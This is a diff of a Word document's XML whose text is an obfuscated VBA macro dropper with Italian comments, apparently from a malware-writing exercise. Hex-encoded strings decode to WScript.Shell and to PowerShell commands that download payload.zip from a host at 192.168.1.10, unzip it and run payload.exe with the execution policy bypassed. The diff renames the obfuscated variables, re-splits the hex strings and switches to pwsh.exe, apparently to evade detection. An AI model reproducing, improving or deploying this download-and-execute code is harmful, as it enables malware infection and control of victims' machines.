+        <w:t>comandoDaEseguire</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, 0, True</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -1539,10 +1769,46 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>' decodifico i due comandi da base64 a normali</w:t>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Call </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>unzip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>estraggo il payload</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1557,75 +1823,12 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>comandoDaEseguire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Replace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>(comandoBase64, "BASE64_ENCODED_COMMAND", codificato)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    comandoDaEseguire2 = </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Replace</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>(comandoBase64, "BASE64_ENCODED_COMMAND", codificato2)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    ' Esegui il comando </w:t>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' Esegui il comando </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1641,7 +1844,7 @@
           <w:color w:val="92D050"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
+        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1652,132 +1855,20 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>shell.Run</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "powershell.exe -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>NoProfile</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ExecutionPolicy</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>comandoDaEseguire</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, 0, True</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Call </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>unzip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>'estraggo il payload</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">' Esegui il comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>PowerShell</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="92D050"/>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>shell.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> "powershell.exe -</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> pwsh.exe </w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2233,7 +2324,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>ttjizrllxwajdvfd</w:t>
+        <w:t>ryanvumxjyltpiowycd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2246,7 +2337,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>euspdrz</w:t>
+        <w:t>araxblmfqpqiamgzv</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2259,7 +2350,7 @@
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>ijuxigpwgeu</w:t>
+        <w:t>lppficfdvsrplxs</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2281,27 +2372,96 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Dim ddvsalsbhsamkq As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim eavmyimjn As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim dsffuvx As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim dbrdnepriwzak As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Set dbrdnepriwzak = VBA.CreateObject(rlhlektfjszistm("575363726970742e53") &amp; rlhlektfjszistm("68656c6c"))</w:t>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>aqerxnt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ouldgiquihkm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>blquaxjinbecmdd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As String</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rxtayoywgtd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rxtayoywgtd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>VBA.CreateObject</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">"5753637269") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>("70742e5368656c6c"))</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2316,28 +2476,28 @@
           <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>ddvsalsbhsamkq</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = rlhlektfjszistm("494558285b53797374656d2e546578742e456e636f64696e675d3a3a555446382e476574537472696e67285b53797374656d2e436f6e766572745d3a3a46726f6d426173653634537472696e67282742") &amp; rlhlektfjszistm("41534536345f454e434f4445445f434f4d4d414e4427292929")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>eavmyimjn</w:t>
+        <w:t>aqerxnt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = tinaalaqpomkulr("494558285b53797374656d2e546578742e456e636f64696e675d3a3a555446382e476574537472696e67285b53797374656d2e436f6e766572745d3a3a46726f6d42617365363453") &amp; tinaalaqpomkulr("7472696e6728274241534536345f454e434f4445445f434f4d4d414e4427292929")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ouldgiquihkm</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2365,7 +2525,7 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>ddvsalsbhsamkq</w:t>
+        <w:t>aqerxnt</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2379,42 +2539,56 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>rlhlektfjszistm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("4241534536345f454e434f4445") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>rlhlektfjszistm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>("445f434f4d4d414e44"), rlhlektfjszistm("4b45356c64793150596d706c59335167546d56304c6c646c596b4e736157567564436b7552473933626d7876595752476157786c4b43646f644852774f6938764d546b794c6a45324f4334784c6a45774f6a") &amp; rlhlektfjszistm("67774d44417663474635624739685a4335366158416e4c43416e517a706356584e6c636e4e6359334a706333526352473933626d78765957527a584842686557787659575175656d6c774a796b3d"))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>dsffuvx</w:t>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("4241534536345f454e434f4445445f434f4d") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("4d414e44"), tinaalaqpomkulr("49435967535735326232746c4c56646c596c4a6c6358566c633351674c5656796153416e6148523063484d364c7938784f5449754d5459344c6a45754d5441364d54497a4e4455765a473933626d7876595752665a6d6c735a5363674c55393164455a70624755674a304d365846567a5a584a7a58474e7961584e3058455276643235736232466b6331787759586c736232466b4c6e7070634363674c564e72615842445a584a30") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>("61575a70593246305a554e6f5a574e72"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>blquaxjinbecmdd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2424,6 +2598,7 @@
         <w:t xml:space="preserve"> = </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="it-IT"/>
@@ -2438,11 +2613,12 @@
         <w:t>(</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>ddvsalsbhsamkq</w:t>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>aqerxnt</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2456,58 +2632,46 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>rlhlektfjszistm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("4241534536345f454e434f4445") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>rlhlektfjszistm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("445f434f4d4d414e44"), rlhlektfjszistm("494359674a304d365846567a5a584a7a58474e7961584e3058455276643235736232466b6331787759586c736232466b4c6d56345a") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>rlhlektfjszistm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>("53633d"))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>dbrdnepriwzak.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("424153") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>("4536345f454e434f4445445f434f4d4d414e44"), tinaalaqpomkulr("494359674a304d365846567a5a584a7a58474e7961584e3058455276") &amp; tinaalaqpomkulr("643235736232466b6331787759586c736232466b4c6d56345a53633d"))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rxtayoywgtd.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="it-IT"/>
@@ -2519,21 +2683,21 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>rlhlektfjszistm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("706f7765727368656c6c2e65786520") &amp; rlhlektfjszistm("2d4e6f50726f66696c65202d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>eavmyimjn</w:t>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("707773682e6578") &amp; tinaalaqpomkulr("65202d4e6f50726f66696c65202d457865637574696f6e506f6c69637920427970617373202d436f6d6d616e6420") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ouldgiquihkm</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2547,7 +2711,7 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>ijuxigpwgeu</w:t>
+        <w:t>lppficfdvsrplxs</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2574,50 +2738,52 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>mbfxexlevptgj</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>dbrdnepriwzak.Run</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> rlhlektfjszistm("706f7765727368656c6c2e657865202d4e6f50726f66696c65202d457865637574696f6e506f6c6963792042797061737320") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>rlhlektfjszistm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">("2d436f6d6d616e6420") &amp; </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>dsffuvx</w:t>
+        <w:t>qmuhjuguvehriraeovg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>rxtayoywgtd.Run</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tinaalaqpomkulr("707773682e657865202d4e6f50726f66696c65202d457865637574696f6e506f6c69637920427970617373202d") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>tinaalaqpomkulr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">("436f6d6d616e6420") &amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>blquaxjinbecmdd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2631,7 +2797,7 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>ijuxigpwgeu</w:t>
+        <w:t>lppficfdvsrplxs</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2643,11 +2809,24 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Rilascio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> l</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
         <w:t xml:space="preserve">Set </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>dbrdnepriwzak</w:t>
+        <w:t>rxtayoywgtd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -2661,79 +2840,336 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Sub mbfxexlevptgj()</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim dqetmcojrcykhkuuroj As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim tsahrpztdxvongdmsl As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim rpvwovdxuqrxdnypyft As Object</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim rmxenvuvefwomujrm As String</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Dim unialsnhj As Variant</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Set dqetmcojrcykhkuuroj = CreateObject(rlhlektfjszistm("536372697074696e") &amp; rlhlektfjszistm("672e46696c6553797374656d4f626a656374"))</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>tsahrpztdxvongdmsl = rlhlektfjszistm("433a5c55736572735c63726973745c446f776e6c6f61") &amp; rlhlektfjszistm("64735c")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>rmxenvuvefwomujrm = Dir(tsahrpztdxvongdmsl, vbNormal)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>unialsnhj = tsahrpztdxvongdmsl</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Do While rmxenvuvefwomujrm &lt;&gt; ""</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Sub </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>qmuhjuguvehriraeovg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Dim </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>amueyxdfeay</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> As Object</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
